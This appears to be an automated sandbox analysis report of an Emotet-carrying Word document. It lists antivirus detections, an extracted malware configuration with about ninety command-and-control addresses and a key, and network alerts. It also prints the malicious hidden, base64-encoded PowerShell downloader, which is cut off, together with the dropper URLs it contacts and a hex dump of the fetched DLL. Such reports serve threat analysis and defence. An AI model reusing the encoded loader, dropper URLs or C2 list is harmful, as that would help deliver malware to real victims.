                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJ

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://3musketeersent.net/wp-includes/TUgD/Avira URL Cloud: Label: malware
                      Source: http://dashudance.com/thinkphp/dgs7Jm9/Avira URL Cloud: Label: malware
                      Source: http://shannared.com/content/lhALeS/Avira URL Cloud: Label: malware
                      Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/Avira URL Cloud: Label: malware
                      Source: http://leopardcranes.com/zynq-linux-yaayf/w/Avira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 7.2.rundll32.exe.2e0000.1.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "185.183.16.47:80", "190.45.24.210:80", "187.162.248.237:80", "93.146.143.191:80", "185.94.252.27:443", "143.0.85.206:7080", "80.15.100.37:80", "85.105.239.184:443", "94.176.234.118:443", "62.84.75.50:80", "137.74.106.111:7080", "172.104.169.32:8080", "46.105.114.137:8080", "94.126.8.1:80", "78.206.229.130:80", "93.149.120.214:80", "192.175.111.212:7080", "80.249.176.206:80", "181.10.46.92:80", "190.24.243.186:80", "191.223.36.170:80", "177.23.7.151:80", "154.127.113.242:80", "51.255.165.160:8080", "87.106.46.107:8080", "85.214.26.7:8080", "190.247.139.101:80", "46.101.58.37:8080", "201.185.69.28:443", "46.43.2.95:8080", "82.208.146.142:7080", "110.39.160.38:443", "186.177.174.163:80", "51.38.124.206:80", "81.4.105.175:8080", "209.33.120.130:80", "172.245.248.239:8080", "45.16.226.117:443", "104.130.154.83:7080", "217.13.106.14:8080", "94.23.45.86:7080", "152.169.22.67:80", "12.162.84.2:8080", "201.48.121.65:443", "81.17.93.134:80", "81.215.230.173:443", "60.93.23.51:80", "122.201.23.45:443", "31.27.59.105:80", "105.209.235.113:8080", "197.232.36.108:80", "91.233.197.70:80", "87.106.253.248:8080", "138.97.60.141:7080", "152.170.79.100:80", "190.251.216.100:80", "177.85.167.10:80", "212.71.237.140:8080", "82.48.39.246:80", "213.52.74.198:80", "116.125.120.88:443", "81.214.253.80:443", "149.62.173.247:8080", "152.231.89.226:80", "206.189.232.2:8080", "181.30.61.163:443", "1.226.84.243:8080", "191.241.233.198:80", "109.101.137.162:8080", "110.39.162.2:443", "167.71.148.58:443", "5.196.35.138:7080", "190.64.88.186:443", "200.75.39.254:80", "138.97.60.140:8080", "170.81.48.2:80", "70.32.115.157:8080", "104.131.41.185:8080", "190.162.232.138:80", "188.135.15.49:80", "95.76.153.115:80", "188.225.32.231:7080", "12.163.208.58:80", "50.28.51.143:8080", "202.134.4.210:7080", "190.210.246.253:80", "149.202.72.142:7080", "138.197.99.250:8080", "68.183.190.199:8080", "211.215.18.93:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://3musketeersent.net/wp-includes/TUgD/Virustotal: Detection: 8%Perma Link
                      Source: https://skilmu.com/wp-admin/hQVlB8b/Virustotal: Detection: 10%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\Kaktksw\An6othh\N49I.dllReversingLabs: Detection: 82%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: ARCH_25_012021.docVirustotal: Detection: 57%Perma Link
                      Source: ARCH_25_012021.docReversingLabs: Detection: 26%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Kaktksw\An6othh\N49I.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0074CC2A CryptDecodeObjectEx,

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098362682.0000000002740000.00000002.00000001.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: shannared.com
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49168 -> 84.232.229.24:80
                      Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49169 -> 51.255.203.164:8080
                      Source: TrafficSnort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49171 -> 217.160.169.110:8080
                      Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49173 -> 185.183.16.47:80
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 84.232.229.24:80
                      Source: Malware configuration extractorIPs: 51.255.203.164:8080
                      Source: Malware configuration extractorIPs: 217.160.169.110:8080
                      Source: Malware configuration extractorIPs: 185.183.16.47:80
                      Source: Malware configuration extractorIPs: 190.45.24.210:80
                      Source: Malware configuration extractorIPs: 187.162.248.237:80
                      Source: Malware configuration extractorIPs: 93.146.143.191:80
                      Source: Malware configuration extractorIPs: 185.94.252.27:443
                      Source: Malware configuration extractorIPs: 143.0.85.206:7080
                      Source: Malware configuration extractorIPs: 80.15.100.37:80
                      Source: Malware configuration extractorIPs: 85.105.239.184:443
                      Source: Malware configuration extractorIPs: 94.176.234.118:443
                      Source: Malware configuration extractorIPs: 62.84.75.50:80
                      Source: Malware configuration extractorIPs: 137.74.106.111:7080
                      Source: Malware configuration extractorIPs: 172.104.169.32:8080
                      Source: Malware configuration extractorIPs: 46.105.114.137:8080
                      Source: Malware configuration extractorIPs: 94.126.8.1:80
                      Source: Malware configuration extractorIPs: 78.206.229.130:80
                      Source: Malware configuration extractorIPs: 93.149.120.214:80
                      Source: Malware configuration extractorIPs: 192.175.111.212:7080
                      Source: Malware configuration extractorIPs: 80.249.176.206:80
                      Source: Malware configuration extractorIPs: 181.10.46.92:80
                      Source: Malware configuration extractorIPs: 190.24.243.186:80
                      Source: Malware configuration extractorIPs: 191.223.36.170:80
                      Source: Malware configuration extractorIPs: 177.23.7.151:80
                      Source: Malware configuration extractorIPs: 154.127.113.242:80
                      Source: Malware configuration extractorIPs: 51.255.165.160:8080
                      Source: Malware configuration extractorIPs: 87.106.46.107:8080
                      Source: Malware configuration extractorIPs: 85.214.26.7:8080
                      Source: Malware configuration extractorIPs: 190.247.139.101:80
                      Source: Malware configuration extractorIPs: 46.101.58.37:8080
                      Source: Malware configuration extractorIPs: 201.185.69.28:443
                      Source: Malware configuration extractorIPs: 46.43.2.95:8080
                      Source: Malware configuration extractorIPs: 82.208.146.142:7080
                      Source: Malware configuration extractorIPs: 110.39.160.38:443
                      Source: Malware configuration extractorIPs: 186.177.174.163:80
                      Source: Malware configuration extractorIPs: 51.38.124.206:80
                      Source: Malware configuration extractorIPs: 81.4.105.175:8080
                      Source: Malware configuration extractorIPs: 209.33.120.130:80
                      Source: Malware configuration extractorIPs: 172.245.248.239:8080
                      Source: Malware configuration extractorIPs: 45.16.226.117:443
                      Source: Malware configuration extractorIPs: 104.130.154.83:7080
                      Source: Malware configuration extractorIPs: 217.13.106.14:8080
                      Source: Malware configuration extractorIPs: 94.23.45.86:7080
                      Source: Malware configuration extractorIPs: 152.169.22.67:80
                      Source: Malware configuration extractorIPs: 12.162.84.2:8080
                      Source: Malware configuration extractorIPs: 201.48.121.65:443
                      Source: Malware configuration extractorIPs: 81.17.93.134:80
                      Source: Malware configuration extractorIPs: 81.215.230.173:443
                      Source: Malware configuration extractorIPs: 60.93.23.51:80
                      Source: Malware configuration extractorIPs: 122.201.23.45:443
                      Source: Malware configuration extractorIPs: 31.27.59.105:80
                      Source: Malware configuration extractorIPs: 105.209.235.113:8080
                      Source: Malware configuration extractorIPs: 197.232.36.108:80
                      Source: Malware configuration extractorIPs: 91.233.197.70:80
                      Source: Malware configuration extractorIPs: 87.106.253.248:8080
                      Source: Malware configuration extractorIPs: 138.97.60.141:7080
                      Source: Malware configuration extractorIPs: 152.170.79.100:80
                      Source: Malware configuration extractorIPs: 190.251.216.100:80
                      Source: Malware configuration extractorIPs: 177.85.167.10:80
                      Source: Malware configuration extractorIPs: 212.71.237.140:8080
                      Source: Malware configuration extractorIPs: 82.48.39.246:80
                      Source: Malware configuration extractorIPs: 213.52.74.198:80
                      Source: Malware configuration extractorIPs: 116.125.120.88:443
                      Source: Malware configuration extractorIPs: 81.214.253.80:443
                      Source: Malware configuration extractorIPs: 149.62.173.247:8080
                      Source: Malware configuration extractorIPs: 152.231.89.226:80
                      Source: Malware configuration extractorIPs: 206.189.232.2:8080
                      Source: Malware configuration extractorIPs: 181.30.61.163:443
                      Source: Malware configuration extractorIPs: 1.226.84.243:8080
                      Source: Malware configuration extractorIPs: 191.241.233.198:80
                      Source: Malware configuration extractorIPs: 109.101.137.162:8080
                      Source: Malware configuration extractorIPs: 110.39.162.2:443
                      Source: Malware configuration extractorIPs: 167.71.148.58:443
                      Source: Malware configuration extractorIPs: 5.196.35.138:7080
                      Source: Malware configuration extractorIPs: 190.64.88.186:443
                      Source: Malware configuration extractorIPs: 200.75.39.254:80
                      Source: Malware configuration extractorIPs: 138.97.60.140:8080
                      Source: Malware configuration extractorIPs: 170.81.48.2:80
                      Source: Malware configuration extractorIPs: 70.32.115.157:8080
                      Source: Malware configuration extractorIPs: 104.131.41.185:8080
                      Source: Malware configuration extractorIPs: 190.162.232.138:80
                      Source: Malware configuration extractorIPs: 188.135.15.49:80
                      Source: Malware configuration extractorIPs: 95.76.153.115:80
                      Source: Malware configuration extractorIPs: 188.225.32.231:7080
                      Source: Malware configuration extractorIPs: 12.163.208.58:80
                      Source: Malware configuration extractorIPs: 50.28.51.143:8080
                      Source: Malware configuration extractorIPs: 202.134.4.210:7080
                      Source: Malware configuration extractorIPs: 190.210.246.253:80
                      Source: Malware configuration extractorIPs: 149.202.72.142:7080
                      Source: Malware configuration extractorIPs: 138.197.99.250:8080
                      Source: Malware configuration extractorIPs: 68.183.190.199:8080
                      Source: Malware configuration extractorIPs: 211.215.18.93:8080
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in memory: http://shannared.com/content/lhALeS/!http://jeevanlic.com/wp-content/r8M/!http://dashudance.com/thinkphp/dgs7Jm9/!http://leopardcranes.com/zynq-linux-yaayf/w/!http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/!http://3musketeersent.net/wp-includes/TUgD/!https://skilmu.com/wp-admin/hQVlB8b/
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 51.255.203.164:8080
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 217.160.169.110:8080
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Wed, 27 Jan 2021 08:30:36 GMTContent-Disposition: attachment; filename="O9TGnKaUCw.dll"Content-Transfer-Encoding: binarySet-Cookie: 601124ac53678=1611736236; expires=Wed, 27-Jan-2021 08:31:36 GMT; Max-Age=60; path=/Last-Modified: Wed, 27 Jan 2021 08:30:36 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Type: application/octet-streamX-Cacheable: YES:ForcedContent-Length: 631808Accept-Ranges: bytesDate: Wed, 27 Jan 2021 08:30:36 GMTAge: 0Vary: User-AgentX-Cache: uncachedX-Cache-Hit: MISSX-Backend: all_requestsData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*
                      Source: global trafficHTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 192.169.223.13 192.169.223.13
                      Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                      Source: Joe Sandbox ViewASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07E7EB5-D643-47FF-B622-0CF30ED55516}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: shannared.com
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
                      Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: http://jeevanlic.com/wp-content/r8M/
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
                      Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
                      Source: powershell.exe, 00000005.00000002.2098057868.00000000022D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103421581.0000000002980000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: http://shannared.com
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2103532538.000000001B8B6000.00000004.00000001.sdmpString found in binary or memory: http://shannared.com/content/lhALeS/
                      Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2098057868.00000000022D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103421581.0000000002980000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
